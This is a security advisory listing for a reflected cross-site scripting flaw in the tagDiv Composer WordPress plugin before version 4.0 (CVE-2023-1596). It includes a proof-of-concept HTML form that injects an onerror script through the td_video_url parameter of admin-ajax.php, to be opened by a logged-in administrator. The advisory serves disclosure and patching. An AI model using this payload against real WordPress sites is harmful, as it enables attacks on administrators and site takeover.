Lucene search
Truoc PhanWPEX-ID:CADA9BE9-522A-4CE8-847D-C8FFF2DDCC07HistoryApr 24, 2023 - 12:00 a.m.
tagDiv Composer < 4.0 - Reflected Cross-site Scripting
2023-04-2400:00:00
Truoc Phan
106
tagdiv composer
cross-site scripting
logged in admin
admin-ajax.php
html code
reflected cross-site scripting
EPSS
0.001
Percentile
31.0%
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Make a logged in admin open a page containing the HTML code below
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="td_ajax_video_modal">
<input type="text" name="td_video_url" value='" onerror=alert(`XSS`) mov'>
<input type="submit" name="submit" value="submit">
</form>Related
cvelist
cvelist
CVE-2023-1596 tagDiv Composer < 4.0 - Reflected Cross-site Scripting
2023-05-15 12:15:36
prion
prion
Cross site scripting
2023-05-15 13:15:00
alpinelinux
alpinelinux
CVE-2023-1596
2023-05-15 13:15:10
wpvulndb
wpvulndb
tagDiv Composer < 4.0 - Reflected Cross-site Scripting
2023-04-24 00:00:00
cve
cve
CVE-2023-1596
2023-05-15 13:15:10
nvd
nvd
CVE-2023-1596
2023-05-15 13:15:10